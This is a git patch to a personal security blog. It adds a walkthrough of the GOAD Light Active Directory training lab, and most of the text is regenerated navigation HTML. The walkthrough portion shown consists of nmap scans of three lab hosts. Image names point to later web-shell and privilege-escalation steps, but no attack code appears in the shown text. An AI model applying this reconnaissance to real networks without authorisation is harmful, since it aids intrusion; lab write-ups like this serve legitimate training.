From 0c7b8054dc74f70bca689bdc764297f2ae80d552 Mon Sep 17 00:00:00 2001 From: f0rk3b0mb Date: Fri, 8 Nov 2024 15:19:16 +0300 Subject: [PATCH] goad light --- 404.html | 2 +- archives/index.html | 24 + categories/htb-boxes/index.html | 14 +- categories/index.html | 53 +- categories/index.xml | 10 +- categories/labs/index.html | 464 +++++ categories/labs/index.xml | 1643 +++++++++++++++++ categories/labs/page/1/index.html | 10 + categories/page/2/index.html | 132 +- categories/reads/index.html | 33 +- categories/reads/index.xml | 612 ------ categories/thm--boxes/index.html | 14 +- categories/thm-boxes/index.html | 14 +- categories/writeups/index.html | 14 +- categories/writeups/page/2/index.html | 14 +- categories/writeups/page/3/index.html | 14 +- .../WhatsApp Image 2024-11-08 at .jpeg | Bin 0 -> 147779 bytes .../WhatsApp Image 2024-11-08 at 1.jpeg | Bin 0 -> 304873 bytes .../WhatsApp Image 2024-11-08 at 15.02..jpeg | Bin 0 -> 96252 bytes ...WhatsApp Image 2024-11-08 at 15.02.19.jpeg | Bin 0 -> 47896 bytes ...WhatsApp Image 2024-11-08 at 15.02.21.jpeg | Bin 0 -> 141224 bytes images/goad_light/admin.jpeg | Bin 0 -> 63849 bytes images/goad_light/hash.jpeg | Bin 0 -> 96252 bytes images/goad_light/print.jpeg | Bin 0 -> 141224 bytes images/goad_light/privesc.jpeg | Bin 0 -> 69294 bytes images/goad_light/sq;_shell.jpeg | Bin 0 -> 304873 bytes images/goad_light/web.jpeg | Bin 0 -> 47896 bytes images/goad_light/web_shell.jpeg | Bin 0 -> 147779 bytes images/goad_light/winrm.jpeg | Bin 0 -> 313320 bytes index.html | 82 +- index.xml | 1022 +++++++++- p/goad-light/index.html | 1621 ++++++++++++++++ p/goad-minilab-walkthrough/index.html | 957 ++++++++++ p/packet-analysis-using-wireshark/index.html | 19 - p/soc_analyst_lab/index.html | 73 +- p/windows-events-and-log-analysis/index.html | 19 - .../index.html | 19 - .../index.html | 19 - page/2/index.html | 74 +- page/3/index.html | 100 +- page/4/index.html | 78 +- page/5/index.html | 94 +- page/6/index.html | 89 +- page/index.html | 14 +- post/index.html | 44 +- post/index.xml | 1022 +++++++++- post/page/2/index.html | 50 +- post/page/3/index.html | 50 +- post/page/4/index.html | 50 +- post/page/5/index.html | 50 +- post/page/6/index.html | 33 +- search/index.json | 2 +- sitemap.xml | 22 +- tags/index.html | 14 +- 54 files changed, 7426 insertions(+), 1258 deletions(-) create mode 100644 categories/labs/index.html create mode 100644 categories/labs/index.xml create mode 100644 categories/labs/page/1/index.html create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at .jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 1.jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 15.02..jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 15.02.19.jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 15.02.21.jpeg create mode 100644 images/goad_light/admin.jpeg create mode 100644 images/goad_light/hash.jpeg create mode 100644 images/goad_light/print.jpeg create mode 100644 images/goad_light/privesc.jpeg create mode 100644 images/goad_light/sq;_shell.jpeg create mode 100644 images/goad_light/web.jpeg create mode 100644 images/goad_light/web_shell.jpeg create mode 100644 images/goad_light/winrm.jpeg create mode 100644 p/goad-light/index.html create mode 100644 p/goad-minilab-walkthrough/index.html diff --git a/404.html b/404.html index 2874c76..87766cf 100644 --- a/404.html +++ b/404.html @@ -10,7 +10,7 @@ - + diff --git a/archives/index.html b/archives/index.html index d5ee5a6..210649f 100644 --- a/archives/index.html +++ b/archives/index.html @@ -272,6 +272,19 @@

Categories

+ + + +
@@ -351,6 +364,17 @@

Thm Boxes

2024

+ +
diff --git a/categories/htb-boxes/index.html b/categories/htb-boxes/index.html index 97dc026..c19c25e 100644 --- a/categories/htb-boxes/index.html +++ b/categories/htb-boxes/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs diff --git a/categories/index.html b/categories/index.html index d55a70f..37fdcc2 100644 --- a/categories/index.html +++ b/categories/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

5 pages

+

6 pages

Categories

@@ -392,6 +396,17 @@

Categories

+ + - -
+ +
@@ -461,9 +465,9 @@

@@ -611,9 +615,9 @@

- + - Featured image of post Knightctf_2024 + Featured image of post Soc_analyst_lab
@@ -623,8 +627,8 @@

@@ -632,7 +636,7 @@

- Knightctf_2024 + Soc_analyst_lab

@@ -654,7 +658,7 @@

- +

@@ -669,7 +673,7 @@

@@ -686,9 +690,9 @@

- + - Featured image of post Irisctf_whats_my_password + Featured image of post Knightctf_2024
@@ -707,7 +711,7 @@

- Irisctf_whats_my_password + Knightctf_2024

@@ -729,7 +733,7 @@

- +

@@ -744,7 +748,7 @@

diff --git a/page/3/index.html b/page/3/index.html index ed7e2c4..e277826 100644 --- a/page/3/index.html +++ b/page/3/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11 @@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,15 +387,31 @@

Categories

-
+ -
+
-
- - - Featured image of post Thm_splunk - - -
-
- -

- Thm_splunk + Htb Sherlock Meerkat

@@ -488,7 +492,7 @@

- +

@@ -503,7 +507,7 @@

@@ -520,9 +524,9 @@

- + - Featured image of post Thm_wazuh + Featured image of post Thm_splunk
@@ -532,8 +536,8 @@

@@ -541,7 +545,7 @@

- Thm_wazuh + Thm_splunk

@@ -563,7 +567,7 @@

- +

@@ -595,9 +599,9 @@

- + - Featured image of post Hack_the_boo2023 + Featured image of post Thm_wazuh
@@ -607,8 +611,8 @@

@@ -616,7 +620,7 @@

- Hack_the_boo2023 + Thm_wazuh

@@ -638,7 +642,7 @@

- +

@@ -670,9 +674,9 @@

- + - Featured image of post Thm_owasp + Featured image of post Hack_the_boo2023
@@ -682,8 +686,8 @@

@@ -691,7 +695,7 @@

- Thm_owasp + Hack_the_boo2023

@@ -713,7 +717,7 @@

- +

@@ -728,7 +732,7 @@

diff --git a/page/4/index.html b/page/4/index.html index c9ea5c2..7d04df3 100644 --- a/page/4/index.html +++ b/page/4/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11 @@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -386,9 +390,9 @@

Categories

- + - Featured image of post Blackhat_mea_2023 + Featured image of post Thm_owasp
@@ -398,8 +402,8 @@

Categories

@@ -407,7 +411,7 @@

Categories

- Blackhat_mea_2023 + Thm_owasp

@@ -429,7 +433,7 @@

- +

@@ -444,7 +448,7 @@

@@ -461,9 +465,9 @@

- + - Featured image of post Shehacks_intrervasity_2023 + Featured image of post Blackhat_mea_2023
@@ -482,7 +486,7 @@

- Shehacks_intrervasity_2023 + Blackhat_mea_2023

@@ -504,7 +508,7 @@

- +

@@ -519,7 +523,7 @@

@@ -536,9 +540,9 @@

- + - Featured image of post Windows events and log analysis + Featured image of post Shehacks_intrervasity_2023
@@ -548,8 +552,8 @@

@@ -557,7 +561,7 @@

- Windows events and log analysis + Shehacks_intrervasity_2023

@@ -579,7 +583,7 @@

- +

@@ -611,9 +615,9 @@

- + - Featured image of post ImaginaryCTF2023 + Featured image of post Windows events and log analysis
@@ -623,8 +627,8 @@

@@ -632,7 +636,7 @@

- ImaginaryCTF2023 + Windows events and log analysis

@@ -654,7 +658,7 @@

- +

@@ -669,7 +673,7 @@

@@ -686,9 +690,9 @@

- + - Featured image of post Packet analysis using Wireshark + Featured image of post ImaginaryCTF2023
@@ -698,8 +702,8 @@

@@ -707,7 +711,7 @@

- Packet analysis using Wireshark + ImaginaryCTF2023

@@ -729,7 +733,7 @@

- +

@@ -744,7 +748,7 @@

diff --git a/page/5/index.html b/page/5/index.html index a472488..1cab280 100644 --- a/page/5/index.html +++ b/page/5/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11 @@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,15 +387,23 @@

Categories

-
+ -
+
-
- - - Featured image of post HTB PC - - -
-
@@ -474,7 +478,7 @@

- HTB PC + Nahamcon2023

@@ -496,7 +500,7 @@

- +

@@ -511,7 +515,7 @@

@@ -528,9 +532,9 @@

-
+ -
+
-
- - - Featured image of post htb cyberapocalypse 2023 - - -
-
@@ -691,7 +695,7 @@

- htb cyberapocalypse 2023 + Bic winter con 2023

diff --git a/page/6/index.html b/page/6/index.html index 5bdf835..8b2e5fa 100644 --- a/page/6/index.html +++ b/page/6/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11
@@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,6 +387,81 @@

Categories

+ + +
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,17 @@

Posts

+ + - - diff --git a/post/index.xml b/post/index.xml index f35ee1d..a96fb3b 100644 --- a/post/index.xml +++ b/post/index.xml @@ -6,7 +6,1027 @@ Recent content in Posts on f0rk3b0mb Hugo -- gohugo.io en - Sat, 26 Oct 2024 17:13:14 +0300 + Fri, 08 Nov 2024 14:33:30 +0300 + GOAD LIGHT + https://f0rk3b0mb.github.io/p/goad-light/ + Fri, 08 Nov 2024 14:33:30 +0300 + + https://f0rk3b0mb.github.io/p/goad-light/ + <p>Walkthrough of Active Directory Lab Goad-Light. Check it out &raquo; <a class="link" href="https://github.com/Orange-Cyberdefense/GOAD" target="_blank" rel="noopener" + >here</a></p> +<h3 id="port-scan">Port Scan +</h3><hr> +<p>192.168.0.150</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span><span class="lnt">25 +</span><span class="lnt">26 +</span><span class="lnt">27 +</span><span class="lnt">28 +</span><span class="lnt">29 +</span><span class="lnt">30 +</span><span class="lnt">31 +</span><span class="lnt">32 +</span><span class="lnt">33 +</span><span class="lnt">34 +</span><span class="lnt">35 +</span><span class="lnt">36 +</span><span class="lnt">37 +</span><span class="lnt">38 +</span><span class="lnt">39 +</span><span class="lnt">40 +</span><span class="lnt">41 +</span><span class="lnt">42 +</span><span class="lnt">43 +</span><span class="lnt">44 +</span><span class="lnt">45 +</span><span class="lnt">46 +</span><span class="lnt">47 +</span><span class="lnt">48 +</span><span class="lnt">49 +</span><span class="lnt">50 +</span><span class="lnt">51 +</span><span class="lnt">52 +</span><span class="lnt">53 +</span><span class="lnt">54 +</span><span class="lnt">55 +</span><span class="lnt">56 +</span><span class="lnt">57 +</span><span class="lnt">58 +</span><span class="lnt">59 +</span><span class="lnt">60 +</span><span class="lnt">61 +</span><span class="lnt">62 +</span><span class="lnt">63 +</span><span class="lnt">64 +</span><span class="lnt">65 +</span><span class="lnt">66 +</span><span class="lnt">67 +</span><span class="lnt">68 +</span><span class="lnt">69 +</span><span class="lnt">70 +</span><span class="lnt">71 +</span><span class="lnt">72 +</span><span class="lnt">73 +</span><span class="lnt">74 +</span><span class="lnt">75 +</span><span class="lnt">76 +</span><span class="lnt">77 +</span><span class="lnt">78 +</span><span class="lnt">79 +</span><span class="lnt">80 +</span><span class="lnt">81 +</span><span class="lnt">82 +</span><span class="lnt">83 +</span><span class="lnt">84 +</span><span class="lnt">85 +</span><span class="lnt">86 +</span><span class="lnt">87 +</span><span class="lnt">88 +</span><span class="lnt">89 +</span><span class="lnt">90 +</span><span class="lnt">91 +</span><span class="lnt">92 +</span><span class="lnt">93 +</span><span class="lnt">94 +</span><span class="lnt">95 +</span><span class="lnt">96 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION +</span></span><span class="line"><span class="cl">80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +</span></span><span class="line"><span class="cl">| http-methods: +</span></span><span class="line"><span class="cl">| Supported Methods: OPTIONS TRACE GET HEAD POST +</span></span><span class="line"><span class="cl">|_ Potentially risky methods: TRACE +</span></span><span class="line"><span class="cl">|_http-server-header: Microsoft-IIS/10.0 +</span></span><span class="line"><span class="cl">|_http-title: IIS Windows Server +</span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:27:08Z) +</span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC +</span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn +</span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? +</span></span><span class="line"><span class="cl">464/tcp open kpasswd5? +</span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +</span></span><span class="line"><span class="cl">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">3389/tcp open ssl/ms-wbt-server? +</span></span><span class="line"><span class="cl">| rdp-ntlm-info: +</span></span><span class="line"><span class="cl">| Target_Name: SEVENKINGDOMS +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: SEVENKINGDOMS +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: KINGSLANDING +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">|_ System_Time: 2024-11-07T16:28:09+00:00 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-06T09:02:59 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-05-08T09:02:59 +</span></span><span class="line"><span class="cl">| MD5: d9ec:f182:4515:44a8:0935:5d95:3c86:dd98 +</span></span><span class="line"><span class="cl">|_SHA-1: 00ad:2903:56a1:7c6a:b16c:bd2d:a7c0:c6fb:4edb:e2e9 +</span></span><span class="line"><span class="cl">Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">Host script results: +</span></span><span class="line"><span class="cl">| nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) +</span></span><span class="line"><span class="cl">| Names: +</span></span><span class="line"><span class="cl">| KINGSLANDING&lt;00&gt; Flags: &lt;unique&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">| SEVENKINGDOMS&lt;00&gt; Flags: &lt;group&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">| SEVENKINGDOMS&lt;1c&gt; Flags: &lt;group&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">|_ KINGSLANDING&lt;20&gt; Flags: &lt;unique&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">| smb2-time: +</span></span><span class="line"><span class="cl">| date: 2024-11-07T16:28:09 +</span></span><span class="line"><span class="cl">|_ start_date: N/A +</span></span><span class="line"><span class="cl">| smb2-security-mode: +</span></span><span class="line"><span class="cl">| 3:1:1: +</span></span><span class="line"><span class="cl">|_ Message signing enabled and required +</span></span><span class="line"><span class="cl">|_clock-skew: mean: -1s, deviation: 0s, median: -1s +</span></span></code></pre></td></tr></table> +</div> +</div><p>192.168.0.151</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span><span class="lnt">25 +</span><span class="lnt">26 +</span><span class="lnt">27 +</span><span class="lnt">28 +</span><span class="lnt">29 +</span><span class="lnt">30 +</span><span class="lnt">31 +</span><span class="lnt">32 +</span><span class="lnt">33 +</span><span class="lnt">34 +</span><span class="lnt">35 +</span><span class="lnt">36 +</span><span class="lnt">37 +</span><span class="lnt">38 +</span><span class="lnt">39 +</span><span class="lnt">40 +</span><span class="lnt">41 +</span><span class="lnt">42 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION +</span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:30:04Z) +</span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC +</span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn +</span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T11:44:09 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-11-07T11:44:09 +</span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? +</span></span><span class="line"><span class="cl">464/tcp open kpasswd5? +</span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +</span></span><span class="line"><span class="cl">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T11:44:09 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-11-07T11:44:09 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:30:52+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">3389/tcp open ms-wbt-server? +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. +</span></span><span class="line"><span class="cl">| rdp-ntlm-info: +</span></span><span class="line"><span class="cl">| Target_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: WINTERFELL +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">|_ System_Time: 2024-11-07T16:30:48+00:00 +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-06T09:17:34 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-05-08T09:17:34 +</span></span><span class="line"><span class="cl">Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">Host script results: +</span></span><span class="line"><span class="cl">|_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) +</span></span><span class="line"><span class="cl">| smb2-time: +</span></span><span class="line"><span class="cl">| date: 2024-11-07T16:30:47 +</span></span><span class="line"><span class="cl">|_ start_date: N/A +</span></span><span class="line"><span class="cl">| smb2-security-mode: +</span></span><span class="line"><span class="cl">| 3:1:1: +</span></span><span class="line"><span class="cl">|_ Message signing enabled and required +</span></span></code></pre></td></tr></table> +</div> +</div><p>192.168.0.152</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span><span class="lnt">25 +</span><span class="lnt">26 +</span><span class="lnt">27 +</span><span class="lnt">28 +</span><span class="lnt">29 +</span><span class="lnt">30 +</span><span class="lnt">31 +</span><span class="lnt">32 +</span><span class="lnt">33 +</span><span class="lnt">34 +</span><span class="lnt">35 +</span><span class="lnt">36 +</span><span class="lnt">37 +</span><span class="lnt">38 +</span><span class="lnt">39 +</span><span class="lnt">40 +</span><span class="lnt">41 +</span><span class="lnt">42 +</span><span class="lnt">43 +</span><span class="lnt">44 +</span><span class="lnt">45 +</span><span class="lnt">46 +</span><span class="lnt">47 +</span><span class="lnt">48 +</span><span class="lnt">49 +</span><span class="lnt">50 +</span><span class="lnt">51 +</span><span class="lnt">52 +</span><span class="lnt">53 +</span><span class="lnt">54 +</span><span class="lnt">55 +</span><span class="lnt">56 +</span><span class="lnt">57 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION +</span></span><span class="line"><span class="cl">80/tcp open http Microsoft IIS httpd 10.0 +</span></span><span class="line"><span class="cl">|_http-server-header: Microsoft-IIS/10.0 +</span></span><span class="line"><span class="cl">| http-methods: +</span></span><span class="line"><span class="cl">|_ Potentially risky methods: TRACE +</span></span><span class="line"><span class="cl">|_http-title: Site doesn&#39;t have a title (text/html). +</span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC +</span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn +</span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? +</span></span><span class="line"><span class="cl">1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM +</span></span><span class="line"><span class="cl">| ms-sql-ntlm-info: +</span></span><span class="line"><span class="cl">| 192.168.0.152:1433: +</span></span><span class="line"><span class="cl">| Target_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: NORTH 